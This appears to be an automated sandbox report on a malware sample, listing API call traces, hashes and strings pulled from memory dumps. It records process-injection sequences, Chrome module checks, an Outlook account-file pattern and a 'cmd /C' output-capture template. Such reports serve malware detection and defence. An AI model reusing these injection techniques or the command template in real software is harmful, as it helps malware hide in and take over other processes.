  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name: d3d8sext.exe
Process MD5: 479B945127CC75C2A44ED1B13482FB07
Total matches: 151
Initial Analysis Report: Open
Initial sample Analysis ID: 67591
Initial sample SHA 256: CA5C9DCD28B358A05CF0F3CDA193EB48861E9B0A51E8656C23BE5CAEDF1D2012
Initial sample name: yyy.exe

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
